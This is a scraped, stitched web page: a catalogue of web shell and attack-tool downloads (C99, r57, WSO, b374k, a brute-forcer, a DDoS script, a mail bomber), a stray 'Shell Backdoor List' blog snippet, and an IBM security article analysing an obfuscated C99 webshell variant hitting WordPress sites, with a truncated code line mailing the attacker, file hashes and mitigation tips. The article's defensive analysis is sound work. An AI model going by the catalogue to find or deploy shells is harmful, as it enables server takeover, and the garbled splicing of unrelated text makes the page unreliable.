C99 Backdoor Web Shell



  1. C99 Backdoor Web Shell Cordovan
  2. Webshell
  3. C99 Backdoor Web Shell Scripting
  • Added 14 May 2015 » Sokot Security Team Web-based file manager
  • Added 14 May 2015 » 404 shell code
  • Added 28 Apr 2015 » WHMCS Killer source code
  • Added 28 Apr 2015 » Komut Shell
  • Added 28 Apr 2015 » Bypass Shell source code
  • Added 28 Apr 2015 » Shell Uploader source code
  • Added 27 Apr 2015 » VBA Shell Forcer
  • Added 27 Apr 2015 » C# Shell SQL tool
  • Added 31 Mar 2014 » Madspot shell script
  • Added 31 Mar 2014 » ASPXSpy shell script
  • Added 01 Mar 2014 » Saudi Sh3ll v1.0 Script
  • Added 01 Mar 2014 » K2LL33D shell script
  • Added 01 Mar 2014 » Fi73 M4n4g3r script
  • Added 01 Mar 2014 » FastUnix Mailer script
  • Added 01 Mar 2014 » eX MFTeaM 2009 shell
  • Added 01 Mar 2014 » beleberda uploader script
  • Added 01 Mar 2014 » 302 S*hell script
  • Added 19 Feb 2014 » xML Shell
  • Added 19 Feb 2014 » Storm7Shell Script
  • Added 19 Feb 2014 » SpyShell Script
  • Added 19 Feb 2014 » SimAttacker Shell
  • Added 19 Feb 2014 » PHPJackal Shell
  • Added 19 Feb 2014 » Pekalongan Cyber Shell
  • Added 19 Feb 2014 » I-47 shell
  • Added 19 Feb 2014 » Facebook Bruceforcer Script
  • Added 19 Feb 2014 » Entrika upload shell
  • Added 19 Feb 2014 » EgY_SpIdEr Shell
  • Added 14 Feb 2014 » X-73 Code Uploader
  • Added 14 Feb 2014 » Antichat Shell
  • Added 13 Feb 2014 » Emailer script
  • Added 13 Feb 2014 » cPanel Turbo Force v3
  • Added 13 Feb 2014 » 1n73ction Shell
  • Added 12 Feb 2014 » Symlink_Sa 2.0 Shell
  • Added 12 Feb 2014 » Robot Pirates Property Shell
  • Added 12 Feb 2014 » GNY Shell
  • Added 12 Feb 2014 » Dhanush Shell
  • Added 12 Feb 2014 » c99madshell Script
  • Added 12 Feb 2014 » aLeRHaB ALsauDi Group Upload Script
  • Added 11 Feb 2014 » WSO 2.1 Web Shell
  • Added 11 Feb 2014 » Script Upload By QtRoNiX HaCkEr
  • Added 11 Feb 2014 » K4C3 Undetected Shell (encrypted)
  • Added 11 Feb 2014 » CYBERDARK Shell
  • Added 11 Feb 2014 » Baronexco shell
  • Added 11 Feb 2014 » b374k Backdoor Script
  • Added 10 Feb 2014 » XgroupVn Shell (encrypted)
  • Added 10 Feb 2014 » Web Shell b374k
  • Added 10 Feb 2014 » Unknown Shell Script (encrypted)
  • Added 10 Feb 2014 » The Acid Shell
  • Added 10 Feb 2014 » Suram-Crew Private Backdoor Script (encrypted)
  • Added 10 Feb 2014 » snoop Shell (encrypted)
  • Added 10 Feb 2014 » SnIpEr_SA Shell
  • Added 10 Feb 2014 » r57 Shell (encrypted)
  • Added 10 Feb 2014 » PhpConfigSpy
  • Added 10 Feb 2014 » PHP Anonymous Emailer/Mail Bomber
  • Added 10 Feb 2014 » payme shell (encrypted)
  • Added 10 Feb 2014 » H4 Shell (encrypted)
  • Added 10 Feb 2014 » c99 Shell (updated version)
  • Added 10 Feb 2014 » BoffMax Web Shell (encrypted)
  • Added 10 Feb 2014 » Black-ID Web Shell (encrypted)
  • Added 10 Feb 2014 » Ali Attacker Hack Script
  • Added 09 Feb 2014 » PentaSec Shell (encrypted)
  • Added 09 Feb 2014 » OPeNHaxshell Script
  • Added 09 Feb 2014 » FilesMan Shell (encrypted)
  • Added 09 Feb 2014 » FilesMan Shell (decrypted)
  • Added 28 Jan 2014 » Tryagshell v1.3 (decrypted)
  • Added 28 Jan 2014 » n3tshell by ibllezboy (encrypted)
  • Added 28 Jan 2014 » Locus7s Shell
  • Added 28 Jan 2014 » enitan AKA virus
  • Added 28 Jan 2014 » C102 Shell (encrypted)
  • Added 28 Jan 2014 » C102 Shell
  • Added 26 Jan 2014 » Tryagshell v1.3 (encrypted)
  • Added 26 Jan 2014 » Tiga-Lima remote shell
  • Added 25 Jan 2014 » VB Script
  • Added 25 Jan 2014 » Uploader Script
  • Added 25 Jan 2014 » Tiga-Lima Shell Script
  • Added 25 Jan 2014 » Random Shell Script
  • Added 25 Jan 2014 » N3tShell v. Emp3ror Undetectable #18 (encrypted)
  • Added 25 Jan 2014 » Mr.HiTman shell script (encrypted)
  • Added 25 Jan 2014 » g00nshell v1.3
  • Added 25 Jan 2014 » FaTaLisTiCz_Fx Fx29 Shell
  • Added 24 Jan 2014 » DDoS script
  • Added 24 Jan 2014 » C999 shell
  • Added 24 Jan 2014 » c99 shell (encrypted)
  • Added 24 Jan 2014 » C99 shell

IBM Security is always looking for high-volume anomalies that might signify a new attack trend. One example is webshells, which are scripts (such as PHP, ASPX, etc.) that perform as a control panel graphical user interface (GUI). An attacker could utilize a webshell to gain system-level access to a vulnerable server.

Over the past two months, IBM Managed Security Services (MSS) has noticed a steep increase in attackers’ attempts to push a variant of the popular C99 webshell.

Although we see many attempts to push malicious PHP code on a daily basis, the increased volume of this particular webshell is startling compared to other types of webshell activity IBM MSS tracks: a 45 percent increase from February through March.

According to VirusTotal, relatively few antivirus vendors are catching this variant. What’s more, it’s targeting vulnerable WordPress systems, becoming yet another threat to content management systems (CMS).

Webshells in a Nutshell

Shell Backdoor List - PHP / ASP Shell Backdoor List Reviewed by Zion3R on 5:39 PM Rating: 5 Tags Admin Panel X ASP Backdoor X B374K X Backdoor X C99 X Kacak X PHP Backdoor X R57 X Shell X Shell Backdoor X Shell Backdoor List X Shell-Backdoor-List X Shells X Web Hacking X Web Shell. This specific variant is one of many being used by a mass Web defacer known as Hmei7, who reportedly defaced more than 5,000 WordPress websites over a two-day period. Hmei7 uses backdoors with a.

Webshells can be used legitimately by a system administrator to perform actions on the server, such as creating a user, reading system logs and restarting a service. Unlike a reverse shell, which requires a secondary program such as Netcat to be run on a victim’s machine, webshells require no communications socket and are simply run over HTTP. They are basically backdoors that run from the browser.

Webshells are considered post-exploitation tools. Before the webshell can be used in an attack, a vulnerability must be found on a target Web application. One way to accomplish this is by first uploading the webshell through a file upload page (e.g., a submission form on a company website) and then using a Local File Include (LFI) weakness in the application to include the webshell in one of the pages.

The Request

Let’s begin with what we are seeing: There is one common URL and file name, pagat.txt, that contains an obfuscated PHP script. Attackers will purposely hide their malicious code in an effort to evade detection and assist in bypassing a Web application firewall (WAF) that may be protecting the website.

The following GET request is issued for this particular variant: hxxp://www.victim.com/wp-content/themes/twentythirteen/pagat.txt. The abbreviation “wp” in the request stands for WordPress.

The text file pagat.txt contains the obfuscated code below, which has been purposely truncated in this example for security reasons.

This obfuscated PHP code would be passed to the eval() function only after it is deobfuscated using one of these three methods:

  • Gzinflate inflates a deflated string. This function takes data compressed by gzdeflate() and returns the original uncompressed data.
  • Rot13 is a simple letter-substitution cipher that replaces a character with whatever comes 13 letters after it in the alphabet.
  • Base64 features binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into radix-64.

Any of these three obfuscation methods can be used to decipher obfuscated code by simply using an online PHP decoding tool.

The Mechanism

The PHP module on the victim server will decode the obfuscated strings and execute the script. Once decoded, the script shows its intent. The examples below are purposely truncated for security reasons.

First, an email is sent to [email protected] (actual email obfuscated) confirming the target has been compromised:

mail(“[email protected]“, “$body”, “Hasil Bajakan hxxp://$web$inj

Next, the script creates a form page on the victim’s website:

Next, the attacker will call the new form from the browser. This will enable the attacker to execute shell commands on the server as well as push additional files that can be used for other nefarious actions.

WordPress Content Management Systems at Risk

What is very clear is that this particular variant of the C99 webshell is focusing on WordPress CMS vulnerabilities. Our data showed a distinct upward trend in alert volume tied specifically to this C99 variant. IBM MSS detected almost 1,000 attacks utilizing this specific webshell code beginning in February 2016.

C99 Backdoor Web ShellC99 backdoor web shell scripting

Most of the time, these webshell entry points result from vulnerabilities in third-party plugins (which we know often don’t undergo any security review during development) or an unpatched bug in the parent application. In fact, according to IBM X-Force, the largest percentage of CMS vulnerabilities are found in plugins or modules written by third parties.

This specific variant is one of many being used by a mass Web defacer known as Hmei7, who reportedly defaced more than 5,000 WordPress websites over a two-day period. Hmei7 uses backdoors with a file uploading feature and changes critical site files like index.php or configuration.php, which are essentially the keys to controlling the kingdom. Hmei7 is known to have defaced more than 154,000 websites and is currently being tracked by Zone-H.

Identification

As of April 12, 2016, a Google search for the file name pagat.txt returned more than 32,000 results. Only nine of 68 antivirus products identify this malicious php script, according to VirusTotal. Below is more information about the script:

  • MD5: 6b58157d69de0fc2663a0765e1d9c5b5
  • SHA1: 0a027b75243f8e6230991c8e58520c7e7799c5cf
  • SHA256: c0134d499451bff03335523c9f435f5bce408401d0a042881838d4f309cf8844
  • ssdeep24: FMojOrnQLqFlTuOnAtau89M+2XUSMrL1//5ZOcKVrNVkQYfEVhS2/KDZPep30VLg:KGOr6Y0OAgu8SiLtrKTVI6hS2/3p30Vc
  • File size: 1.5 KB (1515 bytes)
  • File type: PHP

Refer to the associated X-Force Exchange collection for more information.

C99 Backdoor Web Shell Cordovan

Mitigation

We brought this issue forward to draw attention to one of the easiest methods for attackers to achieve unauthorized access to your network. Prevention goes a long way to limiting the risk exposure. The following recommendations can help mitigate the latest variant of the C99 webshell:

Webshell

  • Edit your php.ini file to disallow base64_decode functionality. Find the line that states disable_functions = and change it to disable_functions = eval, base64_decode, gzinflate.
  • Change the name of your uploads folder. WordPress allows write access to this folder through the media uploader, which makes it easier for attackers to upload PHP files that contain shell scripts. If you leave this folder as the default, an attacker with limited knowledge can guess the file path.
  • Install a good security plugin such as the Wordfence WordPress plugin.
  • Change all WordPress defaults to customize your install as much as possible.
  • If your website becomes compromised, anything that requires validation — such as SSL, FTP, SQL, router/firewall CLI, etc. — is also compromised, including your customers’ credentials. You must change all your passwords and advise your customers to do so the same.
  • Scan all files during attachment uploading with ModSecurity. Attackers can take advantage of your excluded content to hide their code. It is no longer feasible to exclude certain file types such as .jpg and .gif since they have been known to contain malicious PHP code within the image headers.
  • Use a CMS security scanner such as Acunetix Vulnerability Scanner or WordPress Security Scanner to test for vulnerabilities in a WordPress installation.

C99 Backdoor Web Shell Scripting

Additional recommendations can be found in the IBM X-Force research report “Understanding the Risks of Content Management Systems.”